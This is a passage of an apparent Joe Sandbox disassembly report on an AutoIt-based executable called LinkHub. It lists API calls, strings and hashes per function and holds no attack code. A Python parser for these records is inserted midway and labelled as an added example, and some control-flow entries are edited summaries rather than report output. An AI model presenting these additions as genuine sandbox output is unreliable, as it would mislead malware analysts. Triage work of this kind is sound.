                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: c44d3f1a48a8f80fe21f42d3996fb85c36e14c11fe15eeaddfdf681a60f9c9b0
                                                                    • Instruction ID: 6349f3c026f17b43c93465fb34b7a80777d9d49a5d84390552f8d0a5c820cd1c
                                                                    • Opcode Fuzzy Hash: c44d3f1a48a8f80fe21f42d3996fb85c36e14c11fe15eeaddfdf681a60f9c9b0
                                                                    • Instruction Fuzzy Hash: 77E04631000748AFCF226FA0ED0CE483B6AEB10381F004015F9498A221DB36EE42DBD0
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 00C7EF07
                                                                    • timeGetTime.WINMM ref: 00C7F107
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C7F228
                                                                    • TranslateMessage.USER32(?), ref: 00C7F27B
                                                                    • DispatchMessageW.USER32(?), ref: 00C7F289
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C7F29F
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C7F2B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                    • String ID:
                                                                    • API String ID: 2189390790-0
                                                                    • Opcode ID: f2cbe845af4fec81aac52a558ad8345fb4e3da78e345036c1dcdead3e2afb9d1
                                                                    • Instruction ID: 2659a8dec5cf41370a31a517d87fd750359f166e7227e086848fd8f61642d4a8
                                                                    • Opcode Fuzzy Hash: f2cbe845af4fec81aac52a558ad8345fb4e3da78e345036c1dcdead3e2afb9d1
                                                                    • Instruction Fuzzy Hash: 8D32DD70604341EFD728CF24C894FAABBE5BF81304F14C56DE569872A2C771EA85CB92

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C73657
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C73681
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C73692
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C736AF
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C736BF
                                                                    • LoadIconW.USER32(000000A9), ref: 00C736D5
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C736E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 406d5fa7d9c004c91a12e0c670a978856a1a10f94eb9846aca1bcbddc1c626ae
                                                                    • Instruction ID: 9096275425c81788971db8251aeaf502ace0908495946cccfd73b987be198ef3
                                                                    • Opcode Fuzzy Hash: 406d5fa7d9c004c91a12e0c670a978856a1a10f94eb9846aca1bcbddc1c626ae
                                                                    • Instruction Fuzzy Hash: 9F21EDB9941308AFDB00DFE4E889BADBBB5FB09710F10411AF619E63A0D7B446448FA1

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00CB071A: CreateFileW.KERNELBASE(00000000,00000000,?,00CB0A84,?,?,00000000,?,00CB0A84,00000000,0000000C), ref: 00CB0737
                                                                    • GetLastError.KERNEL32 ref: 00CB0AEF
                                                                    • __dosmaperr.LIBCMT ref: 00CB0AF6
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00CB0B02
                                                                    • GetLastError.KERNEL32 ref: 00CB0B0C
                                                                    • __dosmaperr.LIBCMT ref: 00CB0B15
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CB0B35
                                                                    • CloseHandle.KERNEL32(?), ref: 00CB0C7F
                                                                    • GetLastError.KERNEL32 ref: 00CB0CB1
                                                                    • __dosmaperr.LIBCMT ref: 00CB0CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: a50594550d9ddeb98fff84695b26f2529ac875a5d0abbe3911ff5bfb9060f88c
                                                                    • Instruction ID: 6d3f2491af0b9aeed5bdb8d50941146ec322af51d4cd6b0a5e875ff379d63b1f
                                                                    • Opcode Fuzzy Hash: a50594550d9ddeb98fff84695b26f2529ac875a5d0abbe3911ff5bfb9060f88c
                                                                    • Instruction Fuzzy Hash: 62A12736A002088FDF19AF68D852BEE7BA1AF06324F24015DF811DB3E1DB319D16DB61

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C75594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C755B2
                                                                      • Part of subcall function 00C75238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7525A
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C753C4
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CB4BFD
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CB4C3E
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CB4C80
                                                                    • _wcslen.LIBCMT ref: 00CB4CE7
                                                                    • _wcslen.LIBCMT ref: 00CB4CF6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 98802146-2727554177
                                                                    • Opcode ID: 352e48d1d81c12c2679c9175a2e4c1d2880c4f2ae485a5b4beb4676b19865678
                                                                    • Instruction ID: cc54593ea8fc9a3fe23bf211d0eee04b596a3a155b10189f0e8364bdd3f1d961
                                                                    • Opcode Fuzzy Hash: 352e48d1d81c12c2679c9175a2e4c1d2880c4f2ae485a5b4beb4676b19865678
                                                                    • Instruction Fuzzy Hash: 2D71BD751043009FC704EF69EC8999ABBE8FF59740F90442EF049C32B1DB719A08DB62

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C734DE
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C734ED
                                                                    • LoadIconW.USER32(00000063), ref: 00C73503
                                                                    • LoadIconW.USER32(000000A4), ref: 00C73515
                                                                    • LoadIconW.USER32(000000A2), ref: 00C73527
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C7353F
                                                                    • RegisterClassExW.USER32(?), ref: 00C73590
                                                                      • Part of subcall function 00C73624: GetSysColorBrush.USER32(0000000F), ref: 00C73657
                                                                      • Part of subcall function 00C73624: RegisterClassExW.USER32(00000030), ref: 00C73681
                                                                      • Part of subcall function 00C73624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C73692
                                                                      • Part of subcall function 00C73624: InitCommonControlsEx.COMCTL32(?), ref: 00C736AF
                                                                      • Part of subcall function 00C73624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C736BF
                                                                      • Part of subcall function 00C73624: LoadIconW.USER32(000000A9), ref: 00C736D5
                                                                      • Part of subcall function 00C73624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C736E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 326b61b3298efa52ce09fde44c0696d9bb1ba60ae8ea30e30be8964d4483abe9
                                                                    • Instruction ID: 0572d551b7107bfba0ff8030d806a58ce5adec321eb911d2d847bc5279424905
                                                                    • Opcode Fuzzy Hash: 326b61b3298efa52ce09fde44c0696d9bb1ba60ae8ea30e30be8964d4483abe9
                                                                    • Instruction Fuzzy Hash: A2213978D00358ABDB109FA5EC49BA9BFB5FB49B50F40401EF608E63A0C3B915848FA0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C73709,?,?), ref: 00C73777
                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00C73709,?,?), ref: 00C737A3
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C737C6
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C73709,?,?), ref: 00C737D1
                                                                    • CreatePopupMenu.USER32 ref: 00C737E5
                                                                    • PostQuitMessage.USER32(00000000), ref: 00C73806
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: c4aafa606e3730efbed7fbc1e8a332d81afab8a885efa014699b19dbb23d3b71
                                                                    • Instruction ID: c19319e5fa3af914a3572e2891f31b1dbfcf2740efe6e36d7f0c1571da2bb260
                                                                    • Opcode Fuzzy Hash: c4aafa606e3730efbed7fbc1e8a332d81afab8a885efa014699b19dbb23d3b71
                                                                    • Instruction Fuzzy Hash: C841E1F52403C4BBDB182F7D8E4DBB93AA5EB45300F44812AF51EC63A0DA759B44BA71

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C72AF9
                                                                    • CoUninitialize.COMBASE ref: 00C72B98
                                                                    • UnregisterHotKey.USER32(?), ref: 00C72D7D
                                                                    • DestroyWindow.USER32(?), ref: 00CB3A1B
                                                                    • FreeLibrary.KERNEL32(?), ref: 00CB3A80
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB3AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: fee9ee2034ba2612486269a536b3ae8f864c8d5a9cc5091e92abf0708624b6bf
                                                                    • Instruction ID: 642dfc6ab987d43a87cc1c8899c3fbe40120c7be38a2de52c8f606106bc5aea9
                                                                    • Opcode Fuzzy Hash: fee9ee2034ba2612486269a536b3ae8f864c8d5a9cc5091e92abf0708624b6bf
                                                                    • Instruction Fuzzy Hash: BFD16B71701252DFCB29EF55C859B69F7A1BF04710F2182AEE84EAB251CB30AE12DF54

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a49ce1bb4f55d7cc325cf483114927f305349875f358095abdb38ca4bec646a4
                                                                    • Instruction ID: 31d09ece14c7d865fdce7362943dbd51bbcf7a5248ef0ac53b837e14f45c765e
                                                                    • Opcode Fuzzy Hash: a49ce1bb4f55d7cc325cf483114927f305349875f358095abdb38ca4bec646a4
                                                                    • Instruction Fuzzy Hash: E9C1E17590434AAFCF11DFA9D846BADBBB0EF0B318F144059E564E73A2C7308A42CB61

                                                                    Control-flow Graph

                                                                    Control-flow graph (node/edge data not reproduced): function at 00C8AC3E, basic blocks 00C8AC3E-00CC8B21; internal calls only (no Win32 API calls in this function).
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                    • API String ID: 0-4285391669
                                                                    • Opcode ID: 8f5eae234e83647799e884c1b6bfcb6e381dd15eeb752870c2e294154386f04c
                                                                    • Instruction ID: b3b938213d9d78ad30c80794b0895e2250e5113c39071a29dbf72a0717041893
                                                                    • Opcode Fuzzy Hash: 8f5eae234e83647799e884c1b6bfcb6e381dd15eeb752870c2e294154386f04c
                                                                    • Instruction Fuzzy Hash: C36248745083419FC724DF25C095BAABBE1FF89308F10895EE4998B3A1DB71DA49CF92

                                                                    Control-flow Graph

                                                                    Control-flow graph: single basic block 00C735B3-00C73623; calls CreateWindowExW (2x) and ShowWindow (2x).
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C735E1
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73602
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C73616
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C7361F
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 20df992f77b766427fc9f2d63933ab845db4aa4c25f77b39b54a30f652d4b0fa
                                                                    • Instruction ID: 1c3873874db147c698ec8f921154a66610d06060d2c0e854ccea78be4e756b26
                                                                    • Opcode Fuzzy Hash: 20df992f77b766427fc9f2d63933ab845db4aa4c25f77b39b54a30f652d4b0fa
                                                                    • Instruction Fuzzy Hash: FDF0B7796403947BE7215F976C0CF373EBEDBC7F50B40041EB908E62A0D6691895DAB0

                                                                    Control-flow Graph

                                                                    Control-flow graph (node/edge data not reproduced): function at 00CE1196, basic blocks 00CE1196-00CE12D0; calls InterlockedExchange, ReadFile, EnterCriticalSection and LeaveCriticalSection.
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CE11B3
                                                                    • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00CE11EE
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00CE120A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00CE1283
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00CE129A
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE12C8
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3368777196-0
                                                                    • Opcode ID: 73eb680fcffffd4b50c2a78669457b0ea9649945994323cf3f3d69de23b37f6e
                                                                    • Instruction ID: 89979f0e2e3f57fbb76d874aa01fc08ec8484215ce3f7fde296a04a5e19d7654
                                                                    • Opcode Fuzzy Hash: 73eb680fcffffd4b50c2a78669457b0ea9649945994323cf3f3d69de23b37f6e
                                                                    • Instruction Fuzzy Hash: 5C416B71900205EFDF049F94DC89AAAB7B9FF04710F1480A5EE04EB296DB30DE61DBA4

                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CB5287
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C76299
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                    • String ID: Line %d: $AutoIt -
                                                                    • API String ID: 2289894680-4094128768
                                                                    • Opcode ID: ca9e7381f46c2f9fc9b4d00e9ec3693870e6144e215f07b831382236751eb89d
                                                                    • Instruction ID: b0d8d2295f2788975a5a0010e21121d51edf671bad0af084d889046dbba1650a
                                                                    • Opcode Fuzzy Hash: ca9e7381f46c2f9fc9b4d00e9ec3693870e6144e215f07b831382236751eb89d
                                                                    • Instruction Fuzzy Hash: 7441B3714087046FC711EB60DC45BEF77E8AF59320F00861EF59D821A1EB709A49D7A2

                                                                    Control-flow Graph

                                                                    Control-flow graph: function at 00C758CB, basic blocks 00C758CB-00C7594A; calls RegOpenKeyExW, RegQueryValueExW and RegCloseKey (reads HKCU\Control Panel\Mouse, value SwapMouseButtons).
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C758EF
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C75910
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C75932
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: e037f29a27f85675c57c75ab9564c9aacdac5d399c598e032b65a217ddc45fea
                                                                    • Instruction ID: 66525a3d22eaf23a797f7c348a046ed4485e19c90154dcf12fecc664f222b068
                                                                    • Opcode Fuzzy Hash: e037f29a27f85675c57c75ab9564c9aacdac5d399c598e032b65a217ddc45fea
                                                                    • Instruction Fuzzy Hash: 81117C75510618FFEB218FA4CC80EAFB7B9EF00760F108419F919E7210E2719E429760
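The per-function records above (API calls with their `ref:` call-site addresses, the `$`-joined String ID, and the Opcode/Instruction hashes) are what an analyst pivots on when triaging this dump. The parser below is an added example, not part of the Joe Sandbox report or its tooling. Its input is a constructed excerpt in the report's layout built from the CreateWindowExW and RegOpenKeyExW records shown above; the AutoIt marker list is an assumption drawn from the strings on this page (the "AutoIt v3" window class and the interpreter's "AutoIt -" and "Variable must be of type 'Object'." messages).

```python
"""Parse Joe Sandbox per-function records into structured data for pivoting.
Added example for triaging this report's function listing; not Joe Sandbox code.
SAMPLE is a constructed excerpt in the report's layout."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000), ref: 00C735E1
• ShowWindow.USER32(00000000,?,?), ref: 00C73616
  • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• Opcode ID: 20df992f77b766427fc9f2d63933ab845db4aa4c25f77b39b54a30f652d4b0fa
• Instruction Fuzzy Hash: FDF0B7796403947BE7215F976C0CF373EBEDBC7F50B40041EB908E62A0D6691895DAB0
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001), ref: 00C758EF
• RegQueryValueExW.KERNELBASE(00000000,00000000), ref: 00C75910
• RegCloseKey.KERNELBASE(00000000), ref: 00C75932
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\\Mouse
• Opcode ID: e037f29a27f85675c57c75ab9564c9aacdac5d399c598e032b65a217ddc45fea
• Instruction Fuzzy Hash: 81117C75510618FFEB218FA4CC80EAFB7B9EF00760F108419F919E7210E2719E429760
"""

HEX = r"[0-9A-Fa-f]+"
# "• Name.MODULE(arg,arg,...), ref: ADDR"
API_RE = re.compile(rf"^[•*-]?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*({HEX})\s*$")
# "• Part of subcall function ADDR: Name.MODULE ref: ADDR"
SUBCALL_RE = re.compile(
    rf"^[•*-]?\s*Part of subcall function\s+({HEX}):\s*(\w+)\.(\w+)\s+ref:\s*({HEX})\s*$")
FIELD_RE = re.compile(
    r"^[•*-]?\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address in the dump
    subcall_of: Optional[int] = None  # parent function when reported as a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per function; 'Instruction Fuzzy Hash' ends a record."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, args.split(",") if args else [], int(ref, 16)))
            continue
        m = SUBCALL_RE.match(line)
        if m:
            parent, name, module, ref = m.groups()
            cur.apis.append(ApiCall(name, module, [], int(ref, 16), int(parent, 16)))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]  # report joins strings with '$'
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.strings or cur.fields:  # unterminated trailing record
        records.append(cur)
    return records


# Assumption: AutoIt v3 runtime strings observed in this report's records.
AUTOIT_MARKERS = ("AutoIt v3", "AutoIt -", "Variable must be of type 'Object'.")


def autoit_indicators(records: List[FunctionRecord]) -> List[str]:
    """Strings or API arguments that match the AutoIt runtime markers."""
    hits = set()
    for rec in records:
        candidates = list(rec.strings) + [a for api in rec.apis for a in api.args]
        hits.update(c for c in candidates if any(c.startswith(m) for m in AUTOIT_MARKERS))
    return sorted(hits)


def registry_reads(records: List[FunctionRecord]):
    """Pair each RegOpenKeyExW call with the hive and subkey from its arguments."""
    hives = {"80000001": "HKCU", "80000002": "HKLM"}
    out = []
    for rec in records:
        for api in rec.apis:
            if api.name == "RegOpenKeyExW" and len(api.args) >= 2:
                out.append((hives.get(api.args[0], api.args[0]), api.args[1], api.ref))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records; AutoIt markers:", autoit_indicators(recs))
    for hive, key, ref in registry_reads(recs):
        print("registry read", hive + "\\" + key, "at", format(ref, "08X"))
```

Feeding the whole report's function listing through `parse_records` gives one record per function; `autoit_indicators` then confirms the AutoIt v3 runtime markers, and `registry_reads` lists the registry keys each RegOpenKeyExW call site opens, which is how the HKCU\Control Panel\Mouse read above is surfaced.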
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 00CC48C6
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 0d9f803da6ffa1ee6318dddaf6f224ba122289499dbeb45eb633402fbd2d4d48
                                                                    • Instruction ID: 777b65579e6483c9e89bb5909bd5168742fc785ac2b4ca417e3c3cfd084d825d
                                                                    • Opcode Fuzzy Hash: 0d9f803da6ffa1ee6318dddaf6f224ba122289499dbeb45eb633402fbd2d4d48
                                                                    • Instruction Fuzzy Hash: 6EC28875A00204DFCB24DF98C894BADB7F1BF09314F24816DE929AB391D771AE42DB91
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00C909D8
